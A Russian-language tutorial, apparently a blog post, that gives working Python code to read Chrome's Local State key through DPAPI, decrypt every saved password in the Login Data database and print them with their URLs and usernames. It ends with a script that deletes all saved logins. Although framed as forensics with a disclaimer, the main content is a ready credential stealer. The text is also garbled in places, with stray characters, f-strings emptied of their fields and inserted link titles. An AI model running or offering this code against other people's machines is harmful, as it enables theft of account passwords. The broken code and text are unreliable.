Поскольку Chrome сохраняет пароли для подключения к различным web-ресурсам локально, в базе данных sqlite એ , возможность извлечения сохраненных паролей в самом популярном браузере — полезная и, порой, решающая задача для успеха криминалистического исследования. Однако, делать это вручную довольно муторно.
Кроме того, Chrome сохраняет большую часть данных о всех просмотрах локально, на вашем диске. Здесь показан реально используемый код Python для извлечения сохраненных паролей в Chrome с Windows, который не однократно использовался при проведении судебной экспертизы, связанной с киберпреступлениями по запросам арбитражного суда. А таких преступлений становится всё больше и больше. Кроме того, показан небольшой скрипт для защиты от подобных атак.
Для начала установим необходимую библиотеки:
pip3 install pycryptodome pypiwin32
Откроем новый файл Python и импортируем необходимые модули:
import os import json import base64 import sqlite3 import win32crypt from Crypto.Cipher import AES import shutil from datetime import timezone, datetime, timedelta
Прежде чем перейти непосредственно к извлечению паролей Chrome, нужно определить несколько полезных функций, которые помогут в основном скрипте:
Top 2 Ways to Backup Chrome Bookmarks and Passwords
def get_chrome_datetime(chromedate): «»»Вернуть объект datetime.datetime из формата datetime в chrome Поскольку `chromedate` форматируется как количество микросекунд с января 1601 г.»»» return datetime(1601, 1, 1) + timedelta(microseconds=chromedate) def get_encryption_key(): local_state_path = os.path.join(os.environ[«USERPROFILE»], «AppData», «Local», «Google», «Chrome», «User Data», «Local State») with open(local_state_path, «r», encoding=»utf-8″) as f: local_state = f.read() local_state = json.loads(local_state) # декодировать ключ шифрования из Base64 key = base64.b64decode(local_state[«os_crypt»][«encrypted_key»]) # удалить DPAPI str key = key[5:] # вернуть расшифрованный ключ, который был изначально зашифрован # использование сеансового ключа, полученного из учетных данных текущего пользователя # документ: http://timgolden.me.uk/pywin32-docs/win32crypt.html return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] def decrypt_password(password, key): try: # получить вектор инициализации iv = password[3:15] password = password[15:] # генерировать шифр cipher = AES.new(key, AES.MODE_GCM, iv) # расшифровать пароль return cipher.decrypt(password)[:-16].decode() except: try: return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) except: # не поддерживается return «»
Функция get_chrome_datetime() отвечает за преобразование формата даты chrome в ронятный формат даты и времени.
Функция get_encryption_key() извлекает и декодирует ключ Advanced Encryption Standard એ , который использовался для шифрования паролей, он хранится в пути %USERPROFILE%AppDataLocalGoogleChromeUser DataLocal State как файл JSON.
This App exposed all your Chrome Passwords!
decrypt_password() принимает зашифрованный пароль и ключ AES в качестве аргументов и возвращает расшифрованную версию пароля.
Ниже приведены основные функции:
def main(): # получить ключ AES key = get_encryption_key() # локальный путь к базе данных sqlite Chrome db_path = os.path.join(os.environ[«USERPROFILE»], «AppData», «Local», «Google», «Chrome», «User Data», «default», «Login Data») # копируем файл в другое место # поскольку база данных будет заблокирована, если в данный момент запущен Chrome filename = «ChromeData.db» shutil.copyfile(db_path, filename) # подключение к БД db = sqlite3.connect(filename) cursor = db.cursor() # таблица logins содержит нужные нам данные cursor.execute(«select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created») # перебор всех строк for row in cursor.fetchall(): origin_url = row[0] action_url = row[1] username = row[2] password = decrypt_password(row[3], key) date_created = row[4] date_last_used = row[5] if username or password: print(f»Origin URL: «) print(f»Action URL: «) print(f»Username: «) print(f»Password: «) else: continue if date_created != 86400000000 and date_created: print(f»Creation date: «) if date_last_used != 86400000000 and date_last_used: print(f»Last Used: «) print(» EnlighterJSRAW» data-enlighter-language=»python»> if __name__ == «__main__»: main()
Результат должен быть примерно в таком формате (очевидно, что здесь использованы невалидные учетные данные):
Отлично, теперь вы знаете, что на вашем компьютере есть масса конфиденциальной информации, которую легко прочитать с помощью подобных скриптов.
Отказ от ответственности: Запускайте этот сценарий только на своем компьютере или на компьютере, на использование которого у Вас есть разрешение. Я не несу никакой ответственности за любое неправомерное использование.
Удаление паролей
Надеюсь убедил вас в том, что хранить пароли в Chrome довольно опасно. Теперь, зададимся вопросом, как можно себя защитить от подобных вредоносных скриптов.
Здесь я напишу сценарий для доступа к базе данных и удаления всех записей в таблице logins :
import sqlite3 import os db_path = os.path.join(os.environ[«USERPROFILE»], «AppData», «Local», «Google», «Chrome», «User Data», «default», «Login Data») db = sqlite3.connect(db_path) cursor = db.cursor() # В таблице logins есть нужные нам данные cursor.execute(«select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created») n_logins = len(cursor.fetchall()) print(f»Deleting a total of logins. «) cursor.execute(«delete from logins») cursor.connection.commit()
Для этого вам потребуется закрыть браузер Chrome, а затем запустить его, вот мой результат:
Deleting a total of 204 logins.
Открыв Chrome на этот раз, вы заметите, что автозаполнение в формах входа больше не существует. Запустив первый скрипт, вы заметите, что он ничего не выводит, так что мы успешно защитились от этого!
Заключение
Здесь вы узнали, как написать сценарии Python для извлечения и удаления паролей Chrome в Windows. Теперь злоумышленники не смогут получить к ним доступ.
Обратите внимание, что здесь говорилось только о файле Login Data , который содержит учетные данные для входа. Изучите этот каталог более подробно.
Например, есть файл History , где хранятся все посещенные URL-адреса, а также поисковые запросы по ключевым словам с множеством других метаданных. Также есть Cookies , Media History , Preferences , QuotaManager , Reporting and NEL , Shortcuts , Top Sites и Web Data .
Это все таблицы базы данных Chrome, к которым можно очень просто получить доступ. Прежде чем их изучать сделайте копию после чего открывайте базу данных, чтобы не закрывать Chrome всякий раз, когда захотите получить доступ к информации.
Всё, на сегодня хватит. Посмотрите полный код в репозитарии на Github.
Немного позже я научу вас взламывать файлы PDF в Python.
Требуется регистрация для доступа к контенту. Регистрация, если Вы уже зарегистрированы — подключитесь
